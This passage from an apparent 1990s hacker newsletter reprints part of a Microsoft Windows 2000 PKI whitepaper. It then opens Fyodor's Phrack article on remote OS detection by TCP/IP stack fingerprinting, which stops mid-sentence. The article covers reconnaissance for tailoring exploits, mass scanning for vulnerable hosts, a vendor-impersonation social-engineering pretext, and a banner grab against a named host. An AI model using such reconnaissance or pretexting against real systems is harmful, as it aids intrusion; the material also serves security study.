Key generation—The CA's public-key pair is generated during the installation process and is
unique to this CA.
CA certificate—For a root CA, the installation process automatically generates a self-signed
CA certificate, using the CA's public/private-key pair. For a child CA, a certificate request can
be generated that may be submitted to an intermediate or root CA.
Active Directory integration—Information concerning the CA is written into a CA object in
the Active Directory during installation. This provides information to domain clients about
available CAs and the types of certificates that they issue.
Issuing policy—The enterprise CA setup automatically installs and configures the
Microsoft-supplied Enterprise Policy Module for the CA. An authorized administrator can
modify the policy, although in most cases this is not necessary.

After a root CA has been established, it is possible to install intermediate or issuing CAs subordinate
to this root CA. The only significant difference in the installation policy is that a certificate request is
generated for submission to a root or intermediate CA. This request may be routed automatically to
online CAs located through the Active Directory, or routed manually in an offline scenario. In either
case, the resultant certificate must be installed at the CA before it can begin operation.

There is an obvious relationship between the enterprise CAs and the Windows 2000 domain trust
model, but, this does not imply a direct mapping between CA trust relationships and domain trust
relationships. Nothing prevents a single CA from servicing entities in multiple domains, or even
entities outside the domain boundary. Similarly, a domain may have multiple enterprise CAs.

CAs are high-value resources, and it is often desirable to provide them with a high degree of
protection, as discussed above. Specific actions that should be considered include:

Physical protection—Since CAs represent highly trusted entities within an enterprise,
protect them from tampering. This requirement is dependent upon the inherent value of the
certification made by the CA. Physical isolation of the CA server, in a facility accessible only
to security administrators, can dramatically reduce the possibility of such attacks.
Key management—The CA keys are its most valuable asset because the private key
provides the basis for trust in the certification process. Cryptographic hardware modules
(accessible to Certificate Services through a CryptoAPI CSP) can provide tamper-resistant key
storage and isolate the cryptographic operations from other software that is running on the
server. This significantly reduces the likelihood that a CA key will be compromised.
Restoration—Loss of a CA due to hardware failure, for example, can create a number of
administrative and operational problems, as well as prevent revocation of existing certificates.
Certificate Services supports backup of a CA instance so that it can be restored at a later
time. This is an important part of the overall CA management process.

Trust In Multiple CA Hierarchies

Based on the preceding discussion, it is evident that the Windows 2000 PKI must deal with trust
relationships across multiple CA hierarchies. This could involve only CA hierarchies within a single
enterprise, but may involve hierarchies within multiple enterprises, as well as commercial CAs (such
as VeriSign, Thawte, and others).

Within the PKI, you can administratively establish and enforce CA-based trust relationships based on
the Windows 2000 domain policy objects. For each trusted root CA, the system provides a means to
apply usage restrictions on certificates that are issued by the CA. For example, you could choose to
validate only certificates that are issued by a CA for server authentication, even if the CA issues
certificates for several purposes.

In addition, individual users can add CA trust relationships that apply only to themselves. This is done
using client functionality and does not involve administrative action.

An alternative to explicitly including all trusted root CAs in a policy object, is to use cross
certificates. These have been used by at least one vendor's PKI product and provide a means to
create a chain of trust from a single, trusted, root CA to multiple other CAs. Windows 2000 PKI is
capable of processing such cross certificates and using them in making trust decisions, but they are
unnecessary in this model. Microsoft chose this approach because of the issues that cross
certificates raise, notably:

Uncertain interpretation of cross certification across organization boundaries when the CAs
implement disparate policies.
Interpretation of cross certification in the absence of existing business agreements covering
their use.
Additional administrative burden of generating and maintaining cross certificates.

Enabling Domain Clients

Windows 2000 provides a comprehensive set of core services supporting the development and
deployment of interoperable PK-based applications. These core services are also available on
Windows NT 4.0, Windows 98, and Windows 95. The most significant new feature of the
Windows 2000 implementation is integration with the domain administration and policy model,
dramatically simplifying application management within the enterprise.

The remainder of this section discusses the core application services that provided by the PKI.

Generating Keys

Use of PK technology is dependent upon the ability to generate and manage keys for one or more PK
algorithms. the Microsoft CryptoAPI supports installable CSPs that support key generation and
management for a variety of cryptographic algorithms. The CryptoAPI defines standard interfaces for
generating and managing keys that are the same for all CSPs.

Mechanisms for storing key material are dependent on the selected CSP. The Microsoft-provided
software CSPs (or base CSPs) store key material in an encrypted form on a per-user or per-computer
basis. They also support control over public-key pair exportability (CRYPT_EXPORTABLE flag) and
usage control (CRYPT_USER_PROTECT flag). The former controls private-key export from the CSP;
the latter determines user-notification behavior when an application attempts to use the private key.
Other CSPs may implement different mechanisms. For example, smart card CSPs store the
public-key pair in the smart card tamper-resistant hardware and generally require entry of a PIN code
to access operations involving the private key. These protection mechanisms are transparent to an
application, which references all key pairs through a key-set name that is unique in the context of a
CSP.

Key Recovery

The CryptoAPI architecture is compatible with, but does not mandate, key recovery. In this context,
key recovery implies persistent storage of an entity's private key, allowing access by authorized
individuals without knowledge or consent of the owning entity. Typically, this is necessary to ensure
access to critical business correspondence or to meet law-enforcement requirements.

Key recovery is useful only when applied to keys that are used in the encryption of persistent data.
For PK-based applications, this usually implies an entity's key-exchange keys. There is questionable
value, and considerable danger, in archiving identification or digital-signature private keys because
their only practical use would be for impersonation of the private key owner.

Microsoft Exchange currently provides support for recovery of key-exchange keys so that encrypted
e-mail can be read. In addition, third-party CSPs are available that provide general support for key
recovery. Microsoft may include additional key-recovery functionality in the future, depending upon
customer demand.

Certificate Enrollment

As mentioned, practical use of PK-based technology generally relies on certificates to bind public
keys to known entities. The Windows 2000 PKI supports certificate enrollment to the Microsoft
enterprise CA or third-party CAs. Enrollment support is implemented in a transport-independent
manner and is based on use of industry-standard PKCS-10 certificate request messages and
PKCS-7 responses containing the resulting certificate or certificate chain. At this time, certificates
that support RSA keys and signatures, Digital Signature Algorithm (DSA) keys and signatures, and
Diffie-Hellman keys are supported.

Support for PKCS-10 and PKCS-7 messages is provided by a Microsoft-supplied enrollment control
(Xenroll.dll), which can be scripted for Web-based enrollment or called programmatically to support
other transport mechanisms, such as RPC, DCOM, and e-mail. This control allows the calling
application to specify the attributes included in the PKCS-10 message and allows use of an existing
key pair or generation of a new key pair. The enrollment process is assumed to be asynchronous,
and the enrollment control provides state management to match issued certificates against pending
requests. This provides a means of creating an internal binding between the certificate, the CSP that
generated the key pair, and the key-pair container name.

The PKI supports multiple enrollment methods, including Web-based enrollment, an enrollment
wizard, and policy-driven auto-enrollment, which occurs as part of a user's logon processing. In the
future, the certificate enrollment process will evolve in a manner consistent with the Certificate
Request Syntax (CRS) draft current in the IETF PKIX working group.

Renewal

Certificate renewal is conceptually similar to enrollment, but takes advantage of the trust relationship
inherent in an existing certificate. Renewal assumes that the requesting entity wants a new certificate
with the same attributes as an existing, valid certificate, but with extended validity dates. A renewal
may use the existing public key or a new public key.

Renewal is of advantage primarily to the CA. A renewal request can presumably be processed more
efficiently since the existing certificate attributes need not be reverified. Renewal is currently
supported in the Windows 2000 PKI for automatically enrolled certificates. For other mechanisms, a
renewal is treated as a new enrollment request.

Industry-standard message protocols for certificate renewal are not yet defined, but are included in
the IETF PKIX CRS draft. Once these standards are ratified, Microsoft plans to implement the
associated message formats.

Using Keys and Certificates

Within the Microsoft PKI, cryptographic keys and associated certificates are stored and managed by
the CryptoAPI subsystem. As noted, keys are managed by CSPs, and certificates are managed by
the CryptoAPI certificate stores.

The certificate stores are repositories for certificates and their associated properties. By convention,
the PKI defines five standard certificate stores:

MY—This store is used to hold a user's or computer's certificates for which the associated
private key is available.
CA—This store is used to hold issuing or intermediate CA certificates to use in building
certificate-verification chains.
TRUST—This store is used to hold Certificate Trust Lists (CTLs). These are an alternate
mechanism that allows an administrator to specify a collection of trusted CAs. An advantage
is that they may be transmitted over nonsecure links, because they are digitally signed.
ROOT—This store holds only self-signed CA certificates for trusted root CAs.
UserDS—This store provides a logical view of a certificate repository that is stored in the
Active Directory (for example, in the userCertificate property of the User object). Its purpose
is to simplify access to these external repositories.

These are logical stores that can present a consistent, system-wide view of the available certificates
that may reside on multiple physical stores (hard disk, smart cards, and so on). By using these
services, applications can share certificates and are assured of consistent operation under
administrative policy. The certificate management functions support decoding of X.509 v3 certificates
and provide enumeration functions to assist in locating a specific certificate.

To simplify application development, the MY store maintains certificate properties that indicate the
CSP and key-set name for the associated private key. Once an application has selected a certificate
to use, it can use this information to obtain a CSP context for the correct private key.

Recovery

Public key pairs and certificates tend to have high value. If they are lost due to system failure, their
replacement may be time consuming and expensive. Therefore,, the Windows 2000 PKI supports the
ability to back up and restore both certificates and associated key pairs through the
certificate-management administrative tools.

When exporting a certificate, using the certificate manager, the user must specify whether to also
export the associated key pair. If this option is selected, the information is exported as an encrypted
(based on a user-supplied password) PKCS-12 message. This may later be imported to the system,
or another system, to restore the certificate and keys.

This operation assumes that the key pair is exportable by the CSP. This is true for the Microsoft
base CSPs if the exportable flag was set at key generation. Third-party CSPs may or may not
support private key export. For example, smart card CSPs do not generally support this operation.
For software CSPs with nonexportable keys, the alternative is to maintain a complete system-image
backup, including all registry information.

Roaming

Roaming in the context of this paper means the ability to use the same PK-based applications on
different computers within the enterprise Windows environment. The principal requirement is to make
a user's cryptographic keys and certificates available wherever he or she logs on.

The Windows 2000 PKI supports this in two ways. First, if the Microsoft base CSPs are used,
roaming of keys and certificates is supported by the roaming profile mechanism. This is transparent
to the user once roaming profiles are enabled. It is unlikely that this functionality will be supported by
third-party CSPs because they generally use a different method of preserving key data, often on
hardware devices. Second, hardware token devices, such as smart cards, support roaming, provided
that they incorporate a physical certificate store. The smart card CSPs that ship with the
Windows 2000 platform support this functionality. The user carries the hardware token to the new
location.

Revocation

Certificates tend to be long-lived credentials, and there are a number of reasons why these
credentials may become untrustworthy prior to their expiration. Examples include:

Compromise, or suspected compromise, of an entity's private key.
Fraud in obtaining the certificate.
Change in status.

PK-based functionality assumes distributed verification in which there is no need for direct
communication with a central trusted entity that vouches for these credentials. This creates a need
for revocation information that can be distributed to individuals attempting to verify certificates.

The need for revocation information, and its timeliness, is dependent upon the application. To support
a variety of operational factors, the Windows 2000 PKI incorporates support of industry-standard
Certificate Revocation Lists (CRLs). Enterprise CAs support certificate revocation and CRL
publication to the Active Directory under administrative control. Domain clients can obtain this
information and cache it locally to use when verifying certificates. This same mechanism supports
CRLs published by commercial CAs or third-party certificate server products, provided that the
published CRLs are accessible to clients over the network.

Trust

The principal client trust concern when using PK-based functionality is the trust associated with
certificate verification. This is generally based on the trust associated with the CA that issued the
certificate. As discussed, the PKI assumes a rooted CA hierarchy in which the control of trust is
based on decisions concerning root CAs. If a specified end-entity certificate can be shown to chain to
a known trusted root CA, and if the intended certificate usage is consistent with the application
context, it is considered valid. If either of these conditions is not present, it is considered invalid.

Within the PKI, users may make trust decisions that affect only themselves. They do this by
installing or deleting trusted root CAs and configuring associated usage restrictions with the
certificate-management administrative tools. This should be the exception, rather than the rule. These
trust relationships should be established as part of the enterprise policy (See the following section,
PK Security Policy in Windows 2000.) Trust relationships established by policy are automatically
propagated to Windows 2000–based client computers.

PK Security Policy in Windows 2000

Security policies can be applied to sites, domains, or organizational units (OUs), and affect the
associated security groups of users and computers. PK security policy is only one aspect of the
overall Windows security policy and is integrated into this structure. It provides a mechanism to
centrally define and manage policy, while enforcing it globally. The most significant aspects of PK
security policy are discussed below.

Trusted CA Roots

Trust in root CAs may be set by policy to establish trust relationships used by domain clients in
verifying PK certificates. The set of trusted CAs is configured using the Group Policy Editor. It can be
configured on a per-computer basis and apply globally to all users of that computer.

In addition to establishing a root CA as trusted, the administrator can set usage properties
associated with the CA. If specified, these restrict the purposes for which the CA-issued certificates
are valid. Restrictions are specified based on object identifiers (OIDs) as defined for
ExtendedKeyUsage extensions in the IETF PKIX Part 1 draft. Currently, these provide a means of
restricting use to any combination of the following:

Server authentication
Client authentication
Code signing
E-mail
IP Security (IPSec) end system
IPSec tunnel
IPSec user
Time-stamping
Microsoft Encrypted File System

Certificate Enrollment and Renewal

As part of the overall PKI integration with Windows 2000, policy mechanisms have been defined to
support an automated certificate enrollment process. This is controlled by two key elements:
certificate types and auto-enrollment objects. These are integrated with the Group Policy Object and
may be defined on a site, domain, OU, computer, or user basis.

Certificate types provide a template for a certificate and associate it with a common name, for ease of
administration. The template defines elements such as naming requirements, validity period,
allowable CSPs for private key generation, algorithms, and extensions that should be incorporated
into the certificate. The certificate types are logically separated into computer and user types and
applied to the policy objects accordingly. Once defined, these certificate types are available for use
with the auto-enrollment objects and certificate-enrollment wizard.

This mechanism is not a replacement for the enterprise CA issuing policy, but is integrated with it.
The CA service receives a set of certificate types as part of its policy object. These are used by the
Enterprise Policy Module to define the types of certificates that the CA is allowed to issue. The CA
rejects requests for certificates that fail to match these criteria.

The auto-enrollment object defines policy for certificates that an entity in the domain should have.
This can be applied on a computer and user basis. The types of certificates are incorporated by
reference to the certificate type objects and may be any defined type. The auto-enrollment object
provides sufficient information to determine whether an entity has the required certificates and to
enroll for those certificates with an enterprise CA, if they are missing. The auto-enrollment objects
also define policy on certificate renewal. This can be set by an administrator to occur before
certificate expiration, supporting long-term operation without direct user action. The auto-enrollment
objects are processed and any required actions taken whenever policy is refreshed (logon time, GPO
refresh, and so on).

Smart-Card Logon

Smart-card logon (also see the section on smart-card logon in the Applications Overview section
below) is controlled by policy associated with the user object in a manner analogous to password
policy. Policy may be set either to enable smart-card logon, in which case password-based logon
may still be used, or to enforce smart-card logon. In the latter case, protection against unauthorized
access to the account is significantly stronger. It does mean however, that users are unable to log on
if they forget their smart card or attempt to use a computer lacking a smart-card reader.

Applications Overview

This section provides an overview of significant applications that currently take advantage of PK-based
functionality. It is intended to serve as an introduction to the ways you can use PKI to solve real-world
business needs.

Web Security

The Web has rapidly become a key element in creating and deploying solutions for the effective
exchange of information on a worldwide basis. In particular, growth in its use for business purposes
has been dramatic. For many uses, security is a key consideration. Notably:

Server authentication—To enable clients to verify the server they are communicating with.
Client authentication—To allow servers to verify the client's identity and use this as a basis
for access-control decisions.
Confidentiality—Encryption of data between clients and servers to prevent its exposure over
public Internet links.

The Secure Sockets Layer (SSL) and the emerging IETF standard Transport Layer Security (TLS)
protocols play an important role in addressing these needs. SSL and TLS are flexible security
protocols that can be layered on top of other transport protocols. They rely on PK-based
authentication technology and use PK-based key negotiation to generate a unique encryption key for
each client/server session. They are most commonly associated with Web-based applications and
the HTTP protocol (referred to as HTTPS).

SSL and TLS are supported on the Windows platform by the secure channel (Schannel) SSPI
provider. Microsoft Internet Explorer and Internet Information Services both use Schannel for this
functionality. Because Schannel is integrated with Microsoft's SSPI architecture, it is available for use
with multiple protocols to support authenticated and/or encrypted communications.

Taking full advantage of the SSL and TLS protocols requires both clients and servers to have
identification certificates issued by mutually trusted CAs, allowing the parties to authenticate each
other. In this mode, certificates are exchanged along with data that proves possession of the
corresponding private key. Each side can then validate the certificate and verify possession of the
private key, using the certificate's public key. The identifying information included in the certificate
can then be used to make supplemental access-control decisions. For example, the client can
decide whether the server is someone that it wishes to conduct business with, and the server can
decide what data the client can access.

Windows 2000 PKI integrates support for the latter decisions as a standard feature of Windows 2000
Server. User certificates can be mapped on a one-to-one or many-to-one basis against security
principals (User objects) in the Active Directory. Schannel can take advantage of this information to
automatically synthesize a security token for the client so that the Windows ACL mechanisms are
used to enforce access control to resources. This is advantageous for services because they can use
the identical access-control mechanism independent of the client-authentication mechanism used
(PK or Kerberos).

Once the client and server have authenticated each other, they can negotiate a session key and
begin communicating securely. SSL and TLS are also often employed in a mode that does not
require client authentication. Use of mutual authentication is recommended in the enterprise
environment, however, because it allows you to make use of the Windows-based access control
mechanisms. Also, the PKI significantly simplifies certificate enrollment and management, reducing
the burden on the client.

Secure E-mail

PK-based secure e-mail products, including Microsoft Exchange, have been available for a number of
years and are widely deployed. These systems rely on PK technology for:

Digital signatures, to prove origin and authenticity of an e-mail message.
Bulk encryption without prior shared secrets, for confidentiality between correspondents.

The distributed nature of e-mail, and the reliance on store-and-forward transport to multiple recipients,
have been decisive factors in the use of PK technology. Alternate approaches, based on
shared-secret cryptography, impose administrative and physical security requirements that make
them difficult to use.

A limitation of some early implementations was the lack of cross-vendor interoperability. In the
absence of suitable standards, vendors implemented systems that relied on proprietary protocols,
message encodings, and trust assumptions that effectively defined non-interoperable PKIs. (PGP,
though in fairly wide use, is in this category because its messaging formats never became a basis for
interoperable secure e-mail applications within the industry at large.) Only recently has a basis for
interoperable secure e-mail systems emerged from major vendors, with the proposed IETF S/MIME
version 3 standard, which builds upon the S/MIME version 2 proposal from RSA Data Security.
Despite its draft status, S/MIME is currently implemented by a number of products, including
Microsoft Outlook® 98 messaging and collaboration client and Microsoft Outlook Express, with
proven interoperability between vendors for PK encryption and digital signatures, using RSA
algorithms.

In operation, these systems use a user's private key to digitally sign outgoing
e-mail. The user's certificate is then sent along with the e-mail so that the recipient can verify the
signature. S/MIME defines a profile for these certificates to ensure interoperability and assumes a
hierarchical CA model to provide scalable trust management. To encrypt e-mail, the user obtains the
encryption certificate of the recipient, either from prior e-mail or a directory service. Once this
certificate is verified, the user can use the contained public key to encrypt the secret key used to
encrypt the e-mail.

Digitally Signed Content

The growing use of the Internet has driven reliance on downloaded active content, such as
Windows-based applications, ActiveX® controls, and Java applets. The result has been a heightened
concern for the safety of such downloads, since they often occur as a side effect of Web scripts
without any specific user notification. In response to these concerns, Microsoft introduced
AuthenticodeTM digital signature technology in 1996 and introduced significant enhancements in
1997.

Authenticode technology allows software publishers to digitally sign any form of active content,
including multiple-file archives. These signatures may be used to verify both the publishers of the
content and the content integrity at download time. This verification infrastructure scales to the
worldwide base of users of Windows by relying on a hierarchical CA structure in which a small
number of commercial CAs issue software-publishing certificates. For enterprise needs, the
Windows 2000 PKI allows you to issue Authenticode certificates to internal developers or contractors
and allows any employee to verify the origin and integrity of downloaded applications.

Encrypting File System

The Windows 2000 Encrypting File System (EFS) supports transparent encryption and decryption of
files stored on a disk in the Windows NT file system (NTFS). The user can designate individual files
to encrypt or folders whose contents are to be maintained in encrypted form. Applications have
access to a user's encrypted files in the same manner as unencrypted files. However, they cannot
decrypt any other user's encrypted files.

EFS makes extensive use of PK-based technology to provide mechanisms for encrypting files to
multiple users as well as supporting file recovery. To do this, it utilizes the ability of PK to support
bulk encryption without prior shared secrets. In operation, each EFS user generates a public-key pair
and obtains an EFS certificate. The certificate is issued by an enterprise CA in the Windows 2000
domain, although EFS generates a self-signed certificate for stand-alone operation where data
sharing is not an issue. In addition, Windows 2000 supports an EFS recovery policy in which trusted
recovery agents can be designated. These agents generate an EFS recovery public-key pair and are
issued an EFS recovery certificate by the enterprise CA. The certificates of the EFS recovery agents
are published to domain clients with the Group Policy object.

In operation, for each file to be encrypted, EFS creates a random key that is used to encrypt the file.
The user's EFS public key is then used to encrypt this secret key and associate it with the file. In
addition, a copy of the secret key, encrypted with each recovery agent's EFS public key, is
associated with the file. No plaintext copy of the secret key is stored in the system.

When retrieving the file, EFS transparently unwraps the copy of the secret key encrypted with the
user's public key, using the user's private key. This is then used to decrypt the file in real time during
file read and write operations. Similarly, a recovery agent may decrypt the file by using the private key
to access the secret key.

Smart-Card Logon

Windows 2000 introduces PK-based smart-card logon as an alternative to passwords for domain
authentication. This relies on a PC/SC Workgroup-compliant smart-card infrastructure, first
introduced for Windows NT and Windows 95 in December 1997, and RSA-capable smart cards with
supporting CryptoAPI CSPs. The authentication process makes use of the PKINIT protocol, proposed
by the IETF Kerberos working group, to integrate PK-based authentication with the Windows 2000
Kerberos access-control system.

In operation, the system recognizes a smart-card insertion event as an alternative to the standard
CTRL + ALT + DEL secure attention sequence to initiate a logon. The user is then prompted for the
smart-card PIN code, which controls access to operations with the private key stored on the smart
card. In this system, the smart card also contains a copy of the user's certificate (issued by an
enterprise CA). This allows the user to roam within the domain.

IP Security (IPSec)

IPSec defines protocols for network encryption at the IP protocol layer. IPSec does not require
PK-based technology and can use shared-secret keys that are communicated securely through an
out-of-band mechanism at the network end-points for encryption. The IETF IPSec working group
recognized, however, that PK-based technology offers a practical solution to create a scalable
distributed trust architecture, in particular, one in which IPSec devices can mutually authenticate
each other and agree upon encryption keys without reliance on prearranged shared secrets.

The IPSec community, including Microsoft, is actively working on standards for interoperable
certificates and certificate enrollment and management protocols. Although a level of interoperability
has been demonstrated, there is still work required to ensure broad interoperability across IPSec
devices and PKI implementations. Microsoft is committed to developing its Windows 2000 PKI in
conjunction with these evolving standards.

Interoperability

Criteria

In an ideal world, a PKI would be exactly that: an infrastructure. CAs would issue a suite of
completely interoperable certificates based on a standard certificate-request protocol. Applications
would then evaluate them in a consistent manner (including whether they have been revoked), and
there would be no ambiguity in either the syntactic or semantic interpretation anywhere in the
process.

The industry has yet to achieve this level of interoperability. As more applications take advantage of
PK-based technology, relatively seamless interoperability is achievable. Today, SSL/TLS and
S/MIME work well across multiple vendor products. Newer applications, such as code signing and
digitally signed forms are not yet reliable. More troublesome is the fact that there is no current
technical mechanism to compare names in two different language encodings. Unicode, for example,
allows accented characters to be encoded in multiple equivalent forms.

In the future, at least two major forces will drive interoperability:

Initial trials, followed by a growing dependence on PK-based systems.
Greater emphasis on standards.

Microsoft is actively involved in the development of PK-relevant standards and is committed to
building a product based on accepted current standards to maximize interoperability.

Internet Standards

Internet standards do not ensure interoperability, although they help. The historic problem with
standards is that commercial product deployment outpaces the collaborative process. This has been
especially true in PK technology, where the IETF currently has multiple working groups actively
developing proposed standards for PK-based technology. Many of the applications that are potential
beneficiaries of these standards are already shipping products. Moreover, no standard can anticipate
every application requirement and dependency. Even the most comprehensive standards must be
adapted in implementation. Interoperability, then, is the result of standards tempered by market
realities.

The IETF working group charged with defining the basis for an interoperable PKI is PKIX (X.509). After
almost three full years of work, the basic architecture is in place. The specification, RFC 2459,
Internet Public Key Infrastructure X.509 Certificate and CRL Profile, Part 1 is available at
ftp://ftp.isi.edu/in-notes/rfc2459.txt. Microsoft is heavily involved in work on this standard within the
IETF and is committed to assuring that its PKI products are compliant with it. Once ratified, this will
become an important factor in defining a robust PKI that ensures certificates that can be requested,
interpreted, and revoked in some standard way.

There are also a number of other efforts within the IETF that may have significant impact on PKI
interoperability. These are being driven by the needs of PK-based applications, notably TLS, S/MIME,
and IPSec. In each case, these applications made it necessary to define a PKIX subset that meets
their needs; often they supersede PKIX-defined functionality. Although this could appear to fragment
the process, it does create a close-in feedback loop for the PKI designers.

It is not surprising, then, that the most aggressive set of application-dependent standards are
products of the IETF S/MIME working group (http://www.ietf.org/ids.by.wg/smime.html). Of these, the
(S/MIME) Cryptographic Message Syntax, S/MIME Version 3 Message Specification, S/MIME
Version 3 Certificate Handling, and Certificate Request Syntax are the most important. The S/MIME
community, like TLS before it, has the advantage of starting with a de facto standard. PKIX also
started with a standard (X.509), but this has proven inadequate as a basis for interoperable PK-based
systems. This means that PKIX Part 1, the base IETF standard, is gaining experience from the
applications that are trying to use it. A recent example of the feedback process is certificate chain
verification.

PKIX Part 1 suggests, but does not specify, a certificate-chain validation algorithm. One possible
interpretation of the current Internet draft is that name-chaining (that is, matching the certificate issuer
name against a CA name in the subject field of the parent certificate) must always be enforced, even
if information such as AuthorityKeyIdentifier (issuer of a public key) is present. An inherent problem
with this approach, however, is that it does not accommodate two significant public-key
environments: one where there is no directory available to locate CA certificate by name, and
complex ones where there is a complex web of cross-certified CAs. The PKIX working group did not
encounter this class of problem until applications tried to generalize their chain validation algorithms
and found that they could not. The positive effect of this is that the feedback loop is working, and the
new mechanism is now reflected in the standard.

There is also an important forcing function on the horizon for PKI interoperability. The National
Institute of Standards (NIST) has established an interoperability work group, consisting of AT&T,
CertCo, Certicom, Cylink, Digital Signature Trust, Dynacorp, Entrust, Frontier Technologies, GTE, ID
Certify, MasterCard, Microsoft, Motorola, Spyrus, VeriSign, and Visa. The goal of this project is to
ensure minimum interoperability between the members' implementations of PKIX Part 1. NIST is
optimistic that this forum will resolve any ambiguities and/or errors in the new PKIX standard.

Another factor in defining PKI standards lies entirely outside the IETF. There is a set of de facto
cryptographic message standards (PKCS) developed and maintained by RSA Laboratories
(http://www.rsa.com/rsalabs/html/standards.html) that is already broadly deployed in products. The
PKCS standards, first published in 1990, include syntax for cryptographic messages. The standards
that are most relevant to PKI are PKCS-7, Cryptographic Message Syntax Standard, and PKCS-10,
Certification Request Syntax Standard. The significance of the RSA standards is that they provide a
basic, but well-understood framework for interoperability. In fact, when the PKIX working group
proposed another standard for certificate management, the S/MIME working group created its own
proposal based on PKCS. This response is typical of IETF practices and reflects market awareness.
De facto standards are often the best kind, and Microsoft has taken advantage of these standards in
its current PKI implementation to maximize interoperability.

It is fair to expect the standards process to lay the groundwork, but it is ultimately some subset of its
standards that multiple vendors incorporate in their products to create interoperable solutions. A good
example of the role that market forces play in the determination of PK interoperability is how trust
models work.

The term infrastructure implies that PKIs themselves can be linked together. If, for example, a
department within a company chooses Vendor A's PKI model for its application and the company
later chooses Vendor B for its mail system, it makes sense that there should be some natural
overlap. It gets slightly more complicated when Company A and Company B want to selectively join
their PKIs in a business-specific extranet. The technical complexity comes from having to map the
trust relationships (who trusts whom for what) between the entities and keep track of them over time.
There are currently three competing models for how trust relationships should work:

Rooted hierarchies (for example, VeriSign, Microsoft, and Netscape)
Networks (for example, Entrust)
Webs (for example, PGP)

Each of these three trust models assumes something different about how trust relationships are
established and maintained, whether they are created directly or through an intermediary. Different
trust models probably will not interoperate seamlessly. At best, sufficient flexibility can be built into a
PKI, along with supporting administrative tools, to allow users to integrate separate trust models in a
way that makes sense for specific business reasons.

Preparing for Windows 2000 PKI

S/MIME-based E-mail Using Exchange Server

Public Key Infrastructure–based security is relatively new, and there are very few case studies of
actual PKI deployment. To deploy PKI on a wide scale, a corporation must educate its users,
understand the key/certificate management issues, and understand the risks and liabilities
associated with PKI. There are a number of companies that can provide assistance on these issues.
A list is available at www.microsoft.com/security/partners/.

One of the most common areas that can benefit from the use of PKI security is e-mail. Using
S/MIME, which is based on PKI, customers can send digitally signed and encrypted e-mail. Through
the use of S/MIME-based e-mail, corporations can start deploying PKI and build up experience and
expertise.

Microsoft recommends that customers who want to deploy PKI start with Microsoft Exchange Server
5.5 (SP1) and the Microsoft Outlook 98 messaging and collaboration client, which offers S/MIME
based e-mail. The key pieces of a PKI are included in Microsoft Exchange and Microsoft Outlook are:

Key Management server with built-in key recovery features.
X.509 version 3 Certificate Server.
LDAP-based Exchange directory service.
S/MIME clients (Outlook) using CryptoAPI.



Microsoft Exchange Server 5.5 with Microsoft Outlook provides secure e-mail, along with key
recovery features and the ability to have multiple Key Management servers and a certificate trust
hierarchy.

Microsoft will provide a migration path for Exchange users to move to the more generalized PKI
infrastructure provided by Windows 2000, which includes a common enterprise directory service (the
Active Directory) and a common Enterprise Certificate Authority. In a future release, Microsoft will
make the Key Management server a more general-purpose system that other applications can use.

For More Information

For the latest information on Windows 2000 Server and Windows NT, visit the Web site at
http://www.microsoft.com/ntserver, the Microsoft security site at http://www.microsoft.com/security,
and the Windows NT Server Forum on the Microsoft Network (GO WORD: MSNTS).




OSAll © 1998, 1999 Owl Services and Mike Hudack. Owl
Services is not responsible for any content herein, and expects
all visitors to act responsibly. OSAll stands for Owl Site All.
Editorial content does not necessarily reflect the opinion of
OSAll, Burst! Media or its´ advertisers. Owl Services would
like to thank Attrition.org, Hacker News Network and Real
Secure.







-- EOF )




print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"
|dc`

@HWA


50.0 Remote OS detection via TCP/IP Stack FingerPrinting
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

( This is was originally published in PHRACK #54 )


Remote OS detection via TCP/IP Stack FingerPrinting
by Fyodor <fyodor@dhp.com> (www.insecure.org)
Written: October 18, 1998
Last Modified: April 10, 1999

[French Translation by Arhuman <arhuman@francemel.com>]
[Portuguese Translation by Frank Ned <frank@absoluta.org>]

This paper may be freely distributed. The latest copy should always
be available at http://www.insecure.org/nmap/nmap-fingerprinting-article.html


ABSTRACT

This paper discusses how to glean precious information about a host by
querying its TCP/IP stack. I first present some of the "classical"
methods of determining host OS which do not involve stack
fingerprinting. Then I describe the current "state of the art" in
stack fingerprinting tools. Next comes a description of many
techniques for causing the remote host to leak information about
itself. Finally I detail my (nmap) implementation of this, followed
by a snapshot gained from nmap which discloses what OS is running on
many popular Internet sites.


REASONS

I think the usefulness of determining what OS a system is running is
pretty obvious, so I'll make this section short. One of the strongest
examples of this usefulness is that many security holes are dependent
on OS version. Lets say you are doing a penetration test and you find
port 53 open. If this is a vulnerable version of Bind, you only get
one chance to exploit it since a failed attempt will crash the daemon.
With a good TCP/IP fingerprinter, you will quickly find that this
machine is running 'Solaris 2.51' or 'Linux 2.0.35' and you can adjust
your shellcode accordingly.

A worse possibility is someone scanning 500,000 hosts in advance to
see what OS is running and what ports are open. Then when someone
posts (say) a root hole in Sun's comsat daemon, our little cracker
could grep his list for 'UDP/512' and 'Solaris 2.6' and he immediately
has pages and pages of rootable boxes. It should be noted that this
is SCRIPT KIDDIE behavior. You have demonstrated no skill and nobody
is even remotely impressed that you were able to find some vulnerable
.edu that had not patched the hole in time. Also, people will be even
less impressed if you use your newfound access to deface the
department's web site with a self-aggrandizing rant about how damn
good you are and how stupid the sysadmins must be.

Another possible use is for social engineering. Lets say that you are
scanning your target company and nmap reports a 'Datavoice TxPORT
PRISM 3000 T1 CSU/DSU 6.22/2.06'. The hacker might now call up as
'Datavoice support' and discuss some issues about their PRISM 3000.
"We are going to announce a security hole soon, but first we want all
our current customers to install the patch -- I just mailed it to you
..."
Some naive administrators might assume that only an authorized
engineer from Datavoice would know so much about their CSU/DSU.

Another potential use of this capability is evaluation of companies
you may want to do business with. Before you choose a new ISP, scan
them and see what equipment is in use. Those "$99/year" deals don't
sound nearly so good when you find out they have crappy routers and
offer PPP services off a bunch of Windows boxes.


CLASSICAL TECHNIQUES

Stack fingerprinting solves the problem of OS identification in a
unique way. I think this technique holds the most promise, but there
are currently many other solutions. Sadly, this is still one the most
effective of those techniques:

playground~> telnet hpux.u-aizu.ac.jp
Trying 163.143.103.12 ...
Connected to hpux.u-aizu.ac.jp.
Escape character is '^]'.

HP-UX hpux B.10.01 A 9000/715 (ttyp2)

login:

There is no point going to all this trouble of fingerprinting if the
machine will blatantly announce to the world exactly what it is
running! Sadly, many vendors ship current systems with these kind
